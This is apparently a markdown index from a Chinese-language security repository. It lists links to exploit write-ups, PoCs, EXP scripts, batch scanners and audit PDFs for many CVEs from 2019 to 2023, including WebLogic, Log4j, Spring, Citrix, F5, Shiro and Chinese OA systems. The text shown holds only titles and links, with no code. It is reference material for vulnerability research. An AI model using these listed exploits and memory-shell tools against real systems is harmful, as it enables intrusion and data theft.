- [CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass](./CVE-2019-17662-ThinVNC%201.0b1%20-%20Authentication%20Bypass.md)
- [CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd](./CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md)
- [CVE-2019-11043-PHP远程代码执行漏](./CVE-2019-11043)
- [ThinkCMF漏洞全集和](./ThinkCMF漏洞全集和.md)
- [CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行](./CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md)
- [ecologyExp.jar-泛微ecology OA系统数据库配置文件读取](./tools/ecologyExp.jar)
- [freeFTP1.0.8-'PASS'远程缓冲区溢出](./freeFTP1.0.8-'PASS'远程缓冲区溢出.md)
- [rConfig v3.9.2 RCE漏洞](./rConfig%20v3.9.2%20RCE漏洞.md)
- [apache_solr_rce](./solr_rce.md)
- [CVE-2019-7580 thinkcmf-5.0.190111后台任意文件写入导致的代码执行](CVE-2019-7580%20thinkcmf-5.0.190111后台任意文件写入导致的代码执行.md)
- [Apache Flink任意Jar包上传导致远程代码执行](https://github.com/LandGrey/flink-unauth-rce)
- [Jwt_Tool - 用于验证、伪造、扫描和篡改 JWT(JSON Web 令牌)](https://github.com/ticarpi/jwt_tool)
- [cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC](cve-2019-17424%20nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC.md)
- [CVE-2019-12409_Apache_Solr RCE](https://github.com/jas502n/CVE-2019-12409)
- [Shiro RCE (Padding Oracle Attack)](https://github.com/wuppp/shiro_rce_exp)
- [CVE-2019-19634-class.upload.php <= 2.0.4任意文件上传](https://github.com/jra89/CVE-2019-19634)
- [Apache Solr RCE via Velocity Template Injection](./Apache%20Solr%20RCE%20via%20Velocity%20Template%20Injection.md)
- [CVE-2019-10758-mongo-express before 0.54.0 is vulnerable to Remote Code Execution ](https://github.com/masahiro331/CVE-2019-10758/)
- [CVE-2019-2107-Android播放视频-RCE-POC(Android 7.0版本,7.1.1版本,7.1.2版本,8.0版本,8.1版本,9.0版本)](https://github.com/marcinguy/CVE-2019-2107)
- [CVE-2019-19844-Django重置密码漏洞(受影响版本:Django master branch,Django 3.0,Django 2.2,Django 1.11)](https://github.com/ryu22e/django_cve_2019_19844_poc/)
- [CVE-2019-17556-unsafe-deserialization-in-apache-olingo(Apache Olingo反序列化漏洞,影响: 4.0.0版本至4.6.0版本)](https://medium.com/bugbountywriteup/cve-2019-17556-unsafe-deserialization-in-apache-olingo-8ebb41b66817)
- [ZZCMS201910 SQL Injections](./ZZCMS201910%20SQL%20Injections.md)|[ZZCMS201910代码审计](./books/ZZCMS201910代码审计.pdf)
- [WDJACMS1.5.2模板注入漏洞](./WDJACMS1.5.2模板注入漏洞.md)
- [CVE-2019-19781-Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway](https://github.com/projectzeroindia/CVE-2019-19781)
- [CVE-2019-19781.nse---use Nmap check Citrix ADC Remote Code Execution](https://github.com/cyberstruggle/DeltaGroup/tree/master/CVE-2019-19781)
- [Mysql Client 任意文件读取攻击链拓展](https://paper.seebug.org/1112/)
- [CVE-2020-5504-phpMyAdmin注入(需要登录)](https://xz.aliyun.com/t/7092)-[另一篇关于次漏洞的 复现](https://mp.weixin.qq.com/s/epQdTdy6E8QdQTqBbq_Edw)
- [CVE-2020-5509-Car Rental Project 1.0版本中存在远程代码执行漏洞](https://github.com/FULLSHADE/CVE-2020-5509-POC)
- [CryptoAPI PoC CVE-2020-0601](https://github.com/kudelskisecurity/chainoffools/blob/master/README.md)|[另一个PoC for CVE-2020-0601](https://github.com/ollypwn/CVE-2020-0601)
- [New Weblogic RCE (CVE-2020-2546、CVE-2020-2551) CVE-2020-2546](https://mp.weixin.qq.com/s/Q-ZtX-7vt0JnjNbBmyuG0w)|[WebLogic WLS核心组件RCE分析(CVE-2020-2551)](https://www.anquanke.com/post/id/199695)|[CVE-2020-2551-Weblogic IIOP 反序列化EXP](https://github.com/Y4er/CVE-2020-2551)
- [CVE-2020-5398 - RFD(Reflected File Download) Attack for Spring MVC](https://github.com/motikan2010/CVE-2020-5398/)
- [PHPOK v5.3&v5.4getshell](https://www.anquanke.com/post/id/194453) | [phpok V5.4.137前台getshell分析](https://forum.90sec.com/t/topic/728) | [PHPOK 4.7从注入到getshell](https://xz.aliyun.com/t/1569)
- [thinkphp6 session 任意文件创建漏洞复现 含POC](./books/thinkphp6%20session%20任意文件创建漏洞复现%20含POC.pdf) --- 原文在漏洞推送公众号上
- [ThinkPHP 6.x反序列化POP链(一)](./books/ThinkPHP%206.x反序列化POP链(一).pdf)|[原文链接](https://mp.weixin.qq.com/s/rEjt9zb-AksiVwF1GngFww)
- [ThinkPHP 6.x反序列化POP链(二)](./books/ThinkPHP%206.x反序列化POP链(二).pdf)|[原文链接](https://mp.weixin.qq.com/s/q8Xa3triuXEB3NoeOgka1g)
- [ThinkPHP 6.x反序列化POP链(三)](./books/ThinkPHP%206.x反序列化POP链(三).pdf)|[原文链接](https://mp.weixin.qq.com/s/PFNt3yF0boE5lR2KofghBg)
- [WordPress InfiniteWP - Client Authentication Bypass (Metasploit)](https://www.exploit-db.com/exploits/48047)
- [【Linux提权/RCE】OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution](https://www.exploit-db.com/exploits/48051)
- [CVE-2020-7471-django1.11-1.11.282.2-2.2.103.0-3.0.3 StringAgg(delimiter)使用了不安全的数据会造成SQL注入漏洞环境和POC](https://github.com/Saferman/CVE-2020-7471)
- [CVE-2019-17564 : Apache Dubbo反序列化漏洞](https://www.anquanke.com/post/id/198747)
- [CVE-2019-2725(CNVD-C-2019-48814、WebLogic wls9-async)](https://github.com/lufeirider/CVE-2019-2725)
- [YzmCMS 5.4 后台getshell](https://xz.aliyun.com/t/7231)
- 关于Ghostcat(幽灵猫CVE-2020-1938漏洞):[CNVD-2020-10487(CVE-2020-1938), tomcat ajp 文件读取漏洞poc](https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC)|[Java版本POC](https://github.com/0nise/CVE-2020-1938)|[Tomcat-Ajp协议文件读取漏洞](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/)|[又一个python版本CVE-2020-1938漏洞检测](https://github.com/xindongzhuaizhuai/CVE-2020-1938)|[CVE-2020-1938-漏洞复现环境及EXP](https://github.com/laolisafe/CVE-2020-1938)
- [CVE-2020-8840:Jackson-databind远程命令执行漏洞(或影响fastjson)](https://github.com/jas502n/CVE-2020-8840)
- [CVE-2020-8813-Cacti v1.2.8 RCE远程代码执行 EXP以及分析(需要认证/或开启访客即可不需要登录)(一款Linux是基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具)](https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/)|[EXP](./CVE-2020-8813%20-%20Cacti%20v1.2.8%20RCE.md)|[CVE-2020-8813MSF利用脚本](https://www.exploit-db.com/exploits/48159)
- [CVE-2020-7246-PHP项目管理系统qdPM< 9.1 RCE](https://www.exploit-db.com/exploits/48146)
- [CVE-2020-9547:FasterXML/jackson-databind 远程代码执行漏洞](https://github.com/fairyming/CVE-2020-9547)
- [CVE-2020-9548:FasterXML/jackson-databind 远程代码执行漏洞](https://github.com/fairyming/CVE-2020-9548)
- [Apache ActiveMQ 5.11.1目录遍历/ Shell上传](https://cxsecurity.com/issue/WLB-2020030033)
- [CVE-2020-2555:WebLogic RCE漏洞POC](https://mp.weixin.qq.com/s/Wq6Fu-NlK8lzofLds8_zoA)|[CVE-2020-2555-Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE](https://github.com/Y4er/CVE-2020-2555)
- [CVE-2020-1947-Apache ShardingSphere UI YAML解析远程代码执行漏洞](https://github.com/jas502n/CVE-2020-1947)
- [CVE-2020-0554:phpMyAdmin后台SQL注入](./CVE-2020-0554:phpMyAdmin后台SQL注入.md)
- [泛微E-Mobile Ognl 表达式注入](./泛微e-mobile%20ognl注入.md)|[表达式注入.pdf](./books/表达式注入.pdf)
- [泛微10前台上传 getshell](https://github.com/west9b/Weaver/tree/7130bc856cf8b5cbc739a7934cdc01872f4107f3)|[Python 版本 getshell](https://github.com/gglvv/2022hvv-eoffice10-getshell)
- [通达OA RCE漏洞](https://github.com/fuhei/tongda_rce)|[通达OAv11.6版本RCE复现分析+EXP](./books/通达OAv11.6版本漏洞复现分析.pdf)-[EXP下载](./tools/通达OA_v11.6_RCE_EXP.py)
- [CVE-2020-10673-jackson-databind JNDI注入导致远程代码执行](https://github.com/0nise/vuldebug)
- [CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面(Sonatype Nexus <3.21.1)](https://github.com/magicming200/CVE-2020-10199_CVE-2020-10204)
- [CVE-2020-2555-Oracle Coherence 反序列化漏洞](https://github.com/wsfengfan/CVE-2020-2555)|[分析文章](https://paper.seebug.org/1141/)
- [cve-2020-5260-Git凭证泄露漏洞](https://github.com/brompwnie/cve-2020-5260)
- [通达OA前台任意用户伪造登录漏洞批量检测](./通达OA前台任意用户伪造登录漏洞批量检测.md)
- [CVE-2020-11890 JoomlaRCE <3.9.17 远程命令执行漏洞(需要有效的账号密码)](https://github.com/HoangKien1020/CVE-2020-11890)
- [CVE-2020-10238【JoomlaRCE <= 3.9.15 远程命令执行漏洞(需要有效的账号密码)】&CVE-2020-10239【JoomlaRCE 3.7.0 to 3.9.15 远程命令执行漏洞(需要有效的账号密码)】](https://github.com/HoangKien1020/CVE-2020-10238)
- [CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3 payload exploit poc python3](https://github.com/hktalent/CVE_2020_2546)|[CVE-2020-2883-Weblogic coherence.jar RCE](https://github.com/Y4er/CVE-2020-2883)|[WebLogic-Shiro-shell-WebLogic利用CVE-2020-2883打Shiro rememberMe反序列化漏洞,一键注册filter内存shell](https://github.com/Y4er/WebLogic-Shiro-shell)|[shiro_rce_tool:可能是最好用的shiro利用工具](https://github.com/wyzxxz/shiro_rce_tool)|[ShiroExploit:ShiroExploit 是一款 Shiro 可视化利用工具,集成密钥爆破,命令回显内存马注入等功能](https://github.com/KpLi0rn/ShiroExploit)
- [tongda_oa_rce-通达oa 越权登录+文件上传getshell](https://github.com/clm123321/tongda_oa_rce)
- [CVE-2020-11651-SaltStack Proof of Concept【认证绕过RCE漏洞】](https://github.com/0xc0d/CVE-2020-11651)|[CVE-2020-11651&&CVE-2020-11652 EXP](https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP)
- [showdoc的api_page存在任意文件上传getshell](./showdoc的api_page存在任意文件上传getshell.md)
- [Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法](https://github.com/CaijiOrz/fastjson-1.2.47-RCE)
- [SpringBoot_Actuator_RCE](https://github.com/jas502n/SpringBoot_Actuator_RCE)
- [jizhicms(极致CMS)v1.7.1代码审计-任意文件上传getshell+sql注入+反射XSS](./books/jizhicms(极致CMS)v1.7.1代码审计引发的思考.pdf)
- [CVE-2020-9484:Apache Tomcat Session 反序列化代码执行漏洞](./tools/CVE-2020-9484.tgz)|[CVE-2020-9484:Apache Tomcat 反序列化RCE漏洞的分析和利用](https://www.redtimmy.com/java-hacking/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/)
- [PHPOK 最新版漏洞组合拳 GETSHELL](./books/PHPOK最新版漏洞组合拳GETSHELL.pdf)
- [Apache Kylin 3.0.1命令注入漏洞](https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706)
- [weblogic T3 collections java InvokerTransformer Transformer InvokerTransformer weblogic.jndi.WLInitialContextFactory](https://github.com/hktalent/weblogic_java_des)
- [CVE-2020-5410 Spring Cloud Config目录穿越漏洞](https://xz.aliyun.com/t/7877)
- [NewZhan CMS 全版本 SQL注入(0day)](./books/NewZhan%20CMS%20全版本%20SQL注入(0day).pdf)
- [盲注 or 联合?记一次遇见的奇葩注入点之SEMCMS3.9(0day)](./books/盲注%20or%20联合?记一次遇见的奇葩注入点之SEMCMS3.9(0day).pdf)
- [记一次SEMCMS代码审计](./books/记一次SEMCMS代码审计.pdf)
- [对 SEMCMS 再一次审计](./books/对SEMCMS再一次审计.pdf)
- [从PbootCMS(2.0.3&2.0.7前台RCE+2.0.8后台RCE)审计到某狗绕过](./books/从PbootCMS(2.0.3&2.0.7前台RCE+2.0.8后台RCE)审计到某狗绕过.pdf)
- [CVE-2020-1948 : Apache Dubbo 远程代码执行漏洞](https://github.com/ctlyz123/CVE-2020-1948)
- [CVE-2020-5902-F5 BIG-IP 远程代代码执行(RCE)&任意文件包含读取](https://github.com/jas502n/CVE-2020-5902)|[CVE-2020-5902又一EXP加测试docker文件](https://github.com/superzerosec/cve-2020-5902)
- [CVE-2020-8193-Citrix未授权访问任意文件读取](https://github.com/jas502n/CVE-2020-8193)
- [通读审计之天目MVC_T框架带Home版(temmokumvc)_v2.01](./books/通读审计之天目MVC_T框架带Home版(temmokumvc)_v2.01.pdf)
- [CVE-2020-14645-WebLogic 远程代码执行漏洞](https://github.com/Y4er/CVE-2020-14645)|[Weblogic_CVE-2020-14645](https://github.com/DSO-Lab/Weblogic_CVE-2020-14645)
- [CVE-2020-6287-SAP NetWeaver AS JAVA 授权问题漏洞-创建用户EXP](https://github.com/duc-nt/CVE-2020-6287-exploit)|[SAP_RECON-PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)](https://github.com/chipik/SAP_RECON)
- [CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029-jenkins-rce](https://github.com/orangetw/awesome-jenkins-rce-2019)
- [CVE-2020-3452:Cisco ASA/FTD 任意文件读取漏洞](./CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞.md)
- [74CMS_v5.0.1后台RCE分析](./books/74CMS_v5.0.1后台RCE分析.pdf)
- [CVE-2020-8163 - Remote code execution of user-provided local names in Rails](https://github.com/sh286/CVE-2020-8163)
- [【0day RCE】Horde Groupware Webmail Edition RCE](./%E3%80%900day%20RCE%E3%80%91Horde%20Groupware%20Webmail%20Edition%20RCE.md)
- [pulse-gosecure-rce-Tool to test for existence of CVE-2020-8218](https://github.com/withdk/pulse-gosecure-rce-poc)
- [Exploit for Pulse Connect Secure SSL VPN arbitrary file read vulnerability (CVE-2019-11510)](https://github.com/BishopFox/pwn-pulse)
- [Zblog默认Theme_csrf+储存xss+getshell](./Zblog默认Theme_csrf+储存xss+getshell.md)
- [用友GRP-u8 注入+天融信TopApp-LB 负载均衡系统sql注入](https://mrxn.net/Infiltration/292.html)|[绿盟UTS综合威胁探针管理员任意登录复现](https://mrxn.net/Infiltration/276.html)|[HW弹药库之深信服EDR 3.2.21 任意代码执行漏洞分析](https://mrxn.net/jswz/267.html)
- [CVE-2020-13935-Tomcat的WebSocket安全漏洞可导致拒绝服务攻击](https://github.com/RedTeamPentesting/CVE-2020-13935)
- [Douphp 网站后台存储型XSS漏洞分析](./books/Douphp%20网站后台存储型XSS漏洞分析.pdf)-[原文地址](https://mp.weixin.qq.com/s/dmFoMJaUH_ULnhu_T9jSGA)
- [Adminer 简单的利用](./books/Adminer简单的利用.pdf)-[原文地址](https://mp.weixin.qq.com/s/fgi4S-2vdvc-pSmFGGQzgw)
- [骑士CMS assign_resume_tpl远程代码执行分析](./books/骑士CMS%20远程代码执行分析%20-%20Panda.pdf)-[原文地址](https://www.cnpanda.net/codeaudit/827.html)
- [kibana由原型污染导致RCE的漏洞(CVE-2019-7609)](https://github.com/mpgn/CVE-2019-7609)-[YouTube相关报告](https://www.youtube.com/watch?v=KVDOIFeRaPQ)
- [cve-2019-17558-apache solr velocity 注入远程命令执行漏洞 ](https://github.com/SDNDTeam/CVE-2019-17558_Solr_Vul_Tool)
- [Weblogic Server(CVE-2021-2109 )远程代码执行漏洞](./books/Weblogic%20Server(CVE-2021-2109%20)远程代码执行漏洞复现.pdf)-[原文地址](https://mp.weixin.qq.com/s/kEi1s3Ki-h7jjdO7gyDsaw)
- [辰光PHP客服系统源码3.6 前台 getshell-0day](./books/辰光PHP客服系统源码3.620%前台20%getshell-0day.pdf)|[原文地址](https://mp.weixin.qq.com/s/jWqhZYXuBQ2kfpvnWsfeXA)
- [zzzcms(asp)前台Getshell](./zzzcms(asp)前台Getshell.md)
- [wjdhcms前台Getshell(条件竞争)](./books/wjdhcms前台Getshell(条件竞争).pdf)-[原文地址](https://www.t00ls.net/articles-59727.html)
- [glpi_cve-2020-11060](https://github.com/zeromirror/cve_2020-11060)-[相关文章](https://xz.aliyun.com/t/9144)
- [CVE-2021-21315-PoC-Node.js组件systeminformation代码注入漏洞](https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC)
- [CVE-2021-23132-Joomla! 目录遍历导致 RCE 漏洞EXP](https://github.com/HoangKien1020/CVE-2021-23132)|[复现文章](./books/Joomla!%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88CVE-2021-23132%EF%BC%89.pdf)-[原文链接](https://mp.weixin.qq.com/s/rRTCG4Q2X310KoqZNvpuPA)
- [对ShirneCMS的一次审计思路-反序列化getshell](./books/对ShirneCMS的一次审计思路.pdf)-[原文地址](https://mp.weixin.qq.com/s/aps0k7O6BO-UQ0gXbTN3KQ)-[cms地址1](https://gitee.com/shirnecn/ShirneCMS)-[cms地址2](https://github.com/80027505/shirne)
- [Apache Solr最新版任意文件读取0day](./books/Apache%20Solr最新版任意文件读取0day.pdf)|[原文地址](https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ)
- [KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和反序列化)](./books/KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和反序列化).pdf)|[原文地址](https://mp.weixin.qq.com/s/ETm92MHTNksURjOPNqFgHg)
- [CVE-2021-22986-F5 BIG-IP 远程代码执行漏洞EXP](https://github.com/S1xHcL/f5_rce_poc)|[CVE-2021-22986批量检测](https://github.com/Al1ex/CVE-2021-22986)
- [CNVD-2021-10543:MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞](https://github.com/Henry4E36/CNVD-2021-10543)
- [CVE-2021-26295-POC](https://github.com/yumusb/CVE-2021-26295-POC)
- [eyouRCE:(CNVD-2021-26422)亿邮电子邮件系统 远程命令执行漏洞 python版本](https://github.com/Henry4E36/eyouRCE)|[EYouMailRCE:jar单文件版本](https://github.com/Tas9er/EYouMailRCE)
- [ThinkPHP3.2.x RCE漏洞](./books/ThinkPHP3.2.x%20RCE漏洞通报.pdf)
- [Apache Solr SSRF(CVE-2021-27905)](https://github.com/Henry4E36/Solr-SSRF)
- [Coremail任意文件上传漏洞POC,支持单个或者批量检测](https://github.com/jimoyong/CoreMailUploadRce)
- [CVE-2021-26086 :Atlassian Jira Server/Data Center 8.4.0 File Read 漏洞](https://github.com/ColdFusionX/CVE-2021-26086)
- [CVE-2021-41773 CVE-2021-42013漏洞批量检测工具:Apache 2.4.49 和 2.4.50版本任意文件读取和命令执行漏洞绕过利用工具](https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013)
- [CVE-2021-24499:Workreap Theme 小于2.2.1 未授权任意文件上传导致 RCE](https://github.com/RyouYoo/CVE-2021-24499)
- [CVE-2021-30632:chrome V8越界写入漏洞可至内存损坏](https://github.com/Phuong39/PoC-CVE-2021-30632)
- [laravel-exploits:Exploit for CVE-2021-3129](https://github.com/ambionics/laravel-exploits)
- [CVE-2021-21234:Spring Boot 目录遍历](https://github.com/xiaojiangxl/CVE-2021-21234)
- [CVE-2021-22205:gitlab ce 文件上传 ExifTool导致命令执行 的 RCE 漏洞](https://github.com/RedTeamWing/CVE-2021-22205)
- [Hadoop Yarn RPC未授权RCE](https://github.com/cckuailong/YarnRpcRCE)
- [CVE-2021-41277:Metabase 敏感信息泄露](https://github.com/Seals6/CVE-2021-41277)
- [Alibaba Sentinel 前台 SSRF](https://github.com/alibaba/Sentinel/issues/2451)
- [CVE-2021-37580:Apache ShenYu权限认证绕过](https://github.com/fengwenhua/CVE-2021-37580)
- [log4j2_rce](https://github.com/dbgee/log4j2_rce)|[apache-log4j-poc](https://github.com/tangxiaofeng7/apache-log4j-poc)|[CVE-2021-44228:Log4j2](https://github.com/jas502n/Log4j2-CVE-2021-44228)|[log4shell-vulnerable-app:又一个 log4j 练习 APP](https://github.com/christophetd/log4shell-vulnerable-app)
- [cve-2021-45232-exp:Apache apisix dashboard unauthcation rce](https://github.com/wuppp/cve-2021-45232-exp)
- [Spring Boot + H2数据库JNDI注入](./books/Spring%20Boot%20+%20H2数据库JNDI注入.html)|[原文地址](https://mp.weixin.qq.com/s/Yn5U8WHGJZbTJsxwUU3UiQ)
- [CVE-2021-43297:Apache Dubbo Hessian2异常处理时的反序列化](https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297)
- [CVE-2022-21371:Oracle WebLogic Server LFI](https://github.com/Mr-xn/CVE-2022-21371)
- [CVE-2022-0332:Moodle 3.11 to 3.11.4 - SQL injection](https://github.com/numanturle/CVE-2022-0332)
- [CVE-2022-0185:Linux 内核漏洞可导致逃逸Kubernetes中的容器](https://github.com/Crusaders-of-Rust/CVE-2022-0185)
- [cve-2022-23131:zabbix-saml-bypass-exp](https://github.com/Mr-xn/cve-2022-23131)|[另一个 cve-2022-23131](https://github.com/jweny/zabbix-saml-bypass-exp)
- [CVE-2022-22947:Spring Cloud Gateway远程代码执行](https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947)|[CVE-2022-22947:golang 版本](https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway)|[cve-2022-22947-godzilla-memshell:CVE-2022-22947 注入Godzilla内存马](https://github.com/whwlsfb/cve-2022-22947-godzilla-memshell)
- [spring-cloud-function-SpEL-RCE:Spring Cloud Function SpEL RCE](https://github.com/cckuailong/spring-cloud-function-SpEL-RCE)|[相关文章](https://hosch3n.github.io/2022/03/26/SpringCloudFunction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)
- [CVE-2022-22963:Spring-cloud-function-SpEL-RCE](https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE)
- [CVE-2022-22965:spring mvc RCE 的分析](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)|[CVE-2022-22965:Spring Framework RCE (CVE-2022-22965) Nmap (NSE) Checker (Non-Intrusive)](https://github.com/alt3kx/CVE-2022-22965)|[CVE-2022-22965:Spring4Shell的golang 版本检测实现](https://github.com/zer0yu/CVE-2022-22965)
- [CVE-2022-22954-VMware-RCE:VMware Workspace ONE Access RCE](https://github.com/chaosec2021/CVE-2022-22954-VMware-RCE)|[VMware-CVE-2022-22954](https://github.com/sherlocksecurity/VMware-CVE-2022-22954)
- [CVE-2021-31805:S2-062 Apache Struts2 远程代码执行漏洞](https://github.com/YanMu2020/s2-062)
- [CVE-2021-21300:Git符号链接代码执行漏洞](https://github.com/Roboterh/CVE-2021-21300)
- [YonyouNC_Tip:用友NC历史漏洞](https://github.com/j2ekim/YonyouNC_Tip)
- [CVE-2022-1388-EXP:CVE-2022-1388 F5 BIG-IP RCE 批量检测](https://github.com/bytecaps/CVE-2022-1388-EXP)|[CVE-2022-1388 nuclei 模板](https://github.com/numanturle/CVE-2022-1388)|[CVE-2022-1388:另一个扫描脚本](https://github.com/0xf4n9x/CVE-2022-1388)
- [CVE-2022-24734: MyBB论坛后台 RCE](https://github.com/Altelus1/CVE-2022-24734)
- [CVE-2022-0540:Atlassian Jira Seraph Authentication Bypass RCE](https://github.com/Pear1y/CVE-2022-0540-Preauth-RCE)
- [CVE-2022-25237:Bonitasoft Platform 从认证绕过到RCE](https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2022-25237)|[CVE-2022-25237 Bonitasoft Platform 从认证绕过到未公开反序列化漏洞发现之旅](./books/CVE-2022-25237%20Bonitasoft%20Platform%20从认证绕过到未公开反序列化漏洞发现之旅.pdf)
- [CVE-2022-22978:Spring Security身份认证绕过漏洞](https://github.com/XuCcc/VulEnv/tree/master/springboot/cve_2022_22978)|[相关分析](https://bbs.huaweicloud.com/blogs/355165)
- [FastjsonPoc:Fastjson 1.2.80 反序列化代码 Demo 以及环境](https://github.com/YoungBear/FastjsonPoc)
- [CVE-2022-26133:Atlassian Bitbucket Data Center 反序列化漏洞批量验证和利用](https://github.com/Trhackno/CVE-2022-26133)
- [CVE-2022-26134:Confluence OGNL 注入RCE漏洞](https://github.com/Nwqda/CVE-2022-26134)|[另一个cve-2022-26134漏洞利用工具](https://github.com/iveresk/cve-2022-26134)
- [CVE-2022-32275:GRAFANA 8.4.3 DASHBOARD 目录遍历](https://github.com/BrotherOfJhonny/grafana)|[CVE-2022-32276:未授权绕过漏洞](https://github.com/BrotherOfJhonny/grafana)
- [SXF_SSLVPN_arbitrary_get_session:SSLVPN任意用户登录漏洞](https://github.com/DaxiaSec/SXF_SSLVPN_arbitrary_get_session)
- [CVE-2022-28346:DjangoSQL注入QuerySet.annotate(), aggregate(), and extra()环境](https://github.com/YouGina/CVE-2022-28346)|[另一个CVE-2022-28346环境](https://github.com/DeEpinGh0st/CVE-2022-28346)|[CVE-2022-28346相关文章分析](https://www.freebuf.com/vuls/332893.html)
- [CVE-2022-32532:Apache Shiro身份认证绕过漏洞](https://github.com/4ra1n/CVE-2022-32532)
- [CVE-2022-34265:Django SQL注入漏洞](https://github.com/aeyesec/CVE-2022-34265)
- [CVE-2022-33980-Apache-Commons-Configuration-RCE](https://github.com/tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE)
- [cve-2022-33891:Apache Spark Shell命令注入](https://github.com/HuskyHacks/cve-2022-33891)|[又一个cve-2022-33891漏洞利用工具](https://github.com/W01fh4cker/cve-2022-33891)
- [LandrayOATreexmlRCE:蓝凌OA Treexml远程命令执行](https://github.com/Tas9er/LandrayOATreexmlRCE)
- [ZentaoSqli:Zentao v16.5 SQL注入漏洞 POC](https://github.com/z92g/ZentaoSqli)
- [CVE-2022-36446-Webmin-Software-Package-Updates-RCE:Webmin 远程代码执行漏洞](https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE)
- [CVE-2022-33980 Apache Commons Configuration 远程命令执行漏洞](https://github.com/HKirito/CVE-2022-33980)
- [CVE-2022-31101:PrestaShop bockwishlist module 2.1.0 SQLi](https://github.com/karthikuj/CVE-2022-31101)
- [CVE-2022-30525:CVE-2022-30525 Zyxel 防火墙命令注入漏洞 POC&EXPC](https://github.com/west9b/CVE-2022-30525)
- [CVE-2022-2185:gitlab 远程代码执行(需要身份验证)](https://github.com/ESUAdmin/CVE-2022-2185)
- [CVE-2022-27925-PoC:Zimbra Collaboration 存在路径穿越漏洞最终导致RCE](https://github.com/vnhacker1337/CVE-2022-27925-PoC)|[zaber:golang 编写的 CVE-2019-9670 XXE 漏洞利用工具](https://github.com/oppsec/zaber)
- [CVE-2022-1040:Sophos XG115w 防火墙 17.0.10 MR-10 - 身份验证绕过](https://github.com/APTIRAN/CVE-2022-1040)
- [CVE-2022-31269:Nortek Control Linear eMerge E3-Series 信息泄露](https://github.com/Henry4E36/CVE-2022-31269)
- [CNVD-2022-60632 畅捷通任意文件上传漏洞复现](https://www.o2oxy.cn/4104.html)|[备份](https://web.archive.org/web/20220914104920/https://www.o2oxy.cn/4104.html)|[备份2](https://archive.ph/wip/j1Ekr)
- [teleport 堡垒机任意用户登录漏洞](https://www.o2oxy.cn/4132.html)|[备份](https://www.o2oxy.cn/4132.html)|[备份1](https://archive.ph/wip/t9xm1)|[备份2](https://web.archive.org/web/20220914105304/https://www.o2oxy.cn/4132.html)
- [CVE-2022-40127:Apache Airflow < 2.4.0 DAG example_bash_operator RCE POC](https://github.com/Mr-xn/CVE-2022-40127)
- [CVE-2022-36537:ZK framework authentication bypass & connectWise r1Soft server backup manager remote code execution.](https://github.com/numencyber/VulnerabilityPoC/blob/main/CVE-2022-36537/cve-2022-36537.py)
- [CVE-2022-40684: Fortinet FortiOS, FortiProxy, and FortiSwitchManager身份认证绕过漏洞](https://github.com/horizon3ai/CVE-2022-40684)
- [Weblogic-CVE-2023-21839:Oracle WebLogic Server远程代码执行](https://github.com/DXask88MA/Weblogic-CVE-2023-21839)|[Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)](https://github.com/4ra1n/CVE-2023-21839)
- [CVE-2022-39952:FortiNAC keyUpload zipslip 远程代码执行漏洞](https://github.com/horizon3ai/CVE-2022-39952)
- [CVE-2022-21587:Oracle E-Business Suite 未授权RCE](https://github.com/hieuminhnv/CVE-2022-21587-POC)|[Oracle E-BS CVE-2022-21587 Exploit Plugin for woodpecker-framwork](https://github.com/Zh1z3ven/Oracle-E-BS-CVE-2022-21587-Exploit)
- [Alibab-Nacos-Unauthorized-Login: Alibab Nacos <= 2.2.0 未授权访问「默认key生成jwt token」](https://github.com/Al1ex/Alibab-Nacos-Unauthorized-Login)|[Nacos-Authentication-Bypass-Poc ](https://github.com/atk7r/Nacos-Authentication-Bypass-Poc)|[nacos_vul: Nacos身份验证绕过批量检测(QVD-2023-6271)+ 直接添加用户](https://github.com/Pizz33/nacos_vul)
- [CVE-2023-27524: Apache Superset中不安全的默认配置](https://github.com/horizon3ai/CVE-2023-27524)
- [CVE-2023-1671: Sophos Web Appliance 远程命令执行漏洞](https://github.com/W01fh4cker/CVE-2023-1671-POC)
